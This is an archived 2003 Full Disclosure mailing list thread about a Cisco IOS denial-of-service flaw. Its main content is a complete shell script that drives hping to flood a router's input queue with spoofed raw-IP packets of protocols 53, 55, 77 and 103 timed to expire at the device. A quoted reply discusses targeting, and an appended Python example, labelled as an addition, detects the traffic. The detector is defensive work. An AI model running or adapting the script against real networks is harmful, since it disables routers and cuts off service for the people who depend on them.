Full Disclosure mailing list archives
RE: Re: Cisco IOS Denial of Service that affects most Cisco IOS routers- requires power cycle to recover
From: "Donahue, Pat" <PDonahue () acmicorp com>
Date: Fri, 25 Jul 2003 08:46:12 -0400
Here's a simple script I wrote to test our routers and switches.. maybe it will come in handy for your research. I also sent an early version to the snort-users list to help them develop rules. Basically it just wraps hping (http://www.hping.org) with parameters passed on the command line. Try targeting a host inside the network and playing around with the TTL.

--
Patrick Donahue
Network/Systems Administrator
ACMI Corporation

--- BEGIN cisco-44020.sh ---
#!/bin/sh
# 2003-07-21 pdonahue
# cisco-44020.sh
# -- this shell script is just a wrapper for hping (http://www.hping.org)
#    with the parameters necessary to fill the input queue on exploitable IOS device
# -- refer to "Cisco Security Advisory: Cisco IOS Interface Blocked by IPv4 Packets"
#    (http://www.cisco.com/warp/public/707/cisco-sa-20030717-blocked.shtml) for more information

HPING=/usr/local/sbin/hping # -- change this path to match the location of hping on your system

# set defaults
PROT=a
ADDR=r
NUMB=76
SIZE=26

# check usage
if [ "$#" -lt "2" ]; then
    echo "usage: $0 <hostname|address> <ttl> [-p<protocol>] [-a<address>] [-n<packets>] [-s<size>]"
    echo " required:"
    echo " <hostname|address> is the target device (router/switch)"
    echo " <ttl> must be set so the packets expire (TTL=0) at the device"
    echo " optional:"
    echo " -p <protocol> is (a)ll, (53)swipe, (55)ip mobility, (77)sun nd, or (103)pim"
    echo " -a <address> is the source address of the packets; (r)andom or x.x.x.x"
    echo " -n <packets> is the number of packets to send"
    echo " -s <size> is the size of the payload in bytes"
    echo " defaults:"
    echo " $0 <hostname|address> <ttl> -p$PROT -a$ADDR -n$NUMB -s$SIZE"
    echo " examples:"
    echo " $0 10.0.0.1 0"
    echo " 76 (each proto) 26-byte packets : random add. -> 10.0.0.1"
    echo " $0 10.0.0.100 11 -ps -a10.0.0.1 -n76 -s256"
    echo " 76 (swipe only) 512-byte packets : 10.0.0.1 -> 10 hops -> 10.0.0.100"
    exit
else
    HOST=$1; shift;
    TTL=$1; shift;
fi

# parse arguments
while getopts p:a:n:s: o
do
    case "$o" in
        p) # set the protocol
            PROT="$OPTARG"
            ;;
        a) # set the source address
            [ "$OPTARG" != "r" ] && ADDR="-a $OPTARG"
            ;;
        n) # set the number of packets
            NUMB="$OPTARG"
            ;;
        s) # set the size of the payload
            SIZE="$OPTARG"
            ;;
    esac
done

# replace defaults with appropriate values if still set
[ "$PROT" = "a" ] && PROT="53 55 77 103"
[ "$ADDR" = "r" ] && ADDR="--rand-source"

# send the packets
for protocol in $PROT
do
    $HPING $HOST --rawip $ADDR --ttl $TTL --ipproto $protocol --count $NUMB --interval u250 --data $SIZE --file /dev/urandom
done

exit
--- END cisco-44020.sh ---

-----Original Message-----
From: tcleary2 () csc com au [mailto:tcleary2 () csc com au]
Sent: Thursday, July 24, 2003 10:36 PM
To: lee.e.rian () census gov
Cc: full-disclosure () lists netsys com
Subject: RE: [Full-disclosure] Re: Cisco IOS Denial of Service that affects most Cisco IOS routers- requires power cycle to recover

Guys,
So... has anyone been able to verify that the problem occurs when the TTL expires without the packet being addressed to the router? Or is it a requirement that the evil packet be addressed to the router?
As far as we know, the TTL has to go to 1/0 on the target IP address. Haven't been able to get the effect on a transit packet.

Regards,
tom.
__________________________________________________
Security Consultant/Analyst
CSC
Ph: +61 8 9429 6478
Email: tcleary2 () csc com au
----------------------------------------------------------------------------------------
This email, including any attachments, is intended only for use by the addressee(s) and may contain confidential and/or personal information and may also be the subject of legal privilege. Any personal information contained in this email is not to be used or disclosed for any purpose other than the purpose for which you have received it. If you are not the intended recipient, you must not disclose or use the information contained in it. In this case, please let me know by return email, delete the message permanently from your system and destroy any copies.
----------------------------------------------------------------------------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
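
For the detection side of the traffic pattern discussed in this thread, the following is an added example, not part of either message and not Cisco's or the posters' code. It parses raw IPv4 headers and counts packets that use the protocol numbers listed in the script's usage text, are addressed to the device itself, and arrive with a TTL of 0 or 1; the threshold, function names and sample addresses are assumptions made for illustration.

```python
import struct
from collections import Counter

# IP protocol numbers named in the script's usage text on this page.
WATCHED = {53: "swipe", 55: "ip mobility", 77: "sun nd", 103: "pim"}
EXPIRING_TTL = 1      # assumption: TTL of 0 or 1 on arrival expires at this device
ALERT_THRESHOLD = 10  # assumption: per-protocol count that warrants an alert

def _dotted(addr):
    return ".".join(str(octet) for octet in addr)

def parse_ipv4_header(raw):
    """Return (ttl, protocol, src, dst) from raw IPv4 header bytes, or None if malformed."""
    if len(raw) < 20:
        return None
    f = struct.unpack("!BBHHHBBH4s4s", raw[:20])
    if f[0] >> 4 != 4 or (f[0] & 0x0F) < 5:  # version must be 4, IHL at least 5 words
        return None
    return f[5], f[6], _dotted(f[8]), _dotted(f[9])

def suspicious_counts(packets, device_addr):
    """Count watched-protocol packets addressed to device_addr that arrive with an expiring TTL."""
    hits = Counter()
    for raw in packets:
        parsed = parse_ipv4_header(raw)
        if parsed is None:
            continue
        ttl, proto, _src, dst = parsed
        if proto in WATCHED and ttl <= EXPIRING_TTL and dst == device_addr:
            hits[proto] += 1
    return hits

def alerts(packets, device_addr, threshold=ALERT_THRESHOLD):
    """Return the sorted protocol numbers whose hit count reaches the threshold."""
    counts = suspicious_counts(packets, device_addr)
    return sorted(p for p, n in counts.items() if n >= threshold)

def build_header(ttl, proto, src, dst):
    """Constructed sample input: a minimal 20-byte IPv4 header, checksum left at 0."""
    pack = lambda a: bytes(int(x) for x in a.split("."))
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 46, 0, 0, ttl, proto, 0, pack(src), pack(dst))

# Constructed traffic toward a device at 10.0.0.1 (all addresses are made up).
SAMPLE = (
    [build_header(1, 53, "192.0.2.7", "10.0.0.1")] * 12       # expiring, watched: counted
    + [build_header(64, 103, "10.0.0.2", "10.0.0.1")] * 30    # watched but TTL 64: ignored
    + [build_header(0, 77, "198.51.100.9", "10.0.0.1")] * 3   # counted, below threshold
    + [build_header(1, 6, "10.0.0.5", "10.0.0.1")] * 20       # TCP, not watched: ignored
)
```

The destination check follows the reply quoted above, which reports the effect only when the packet is addressed to the device and not on transit packets.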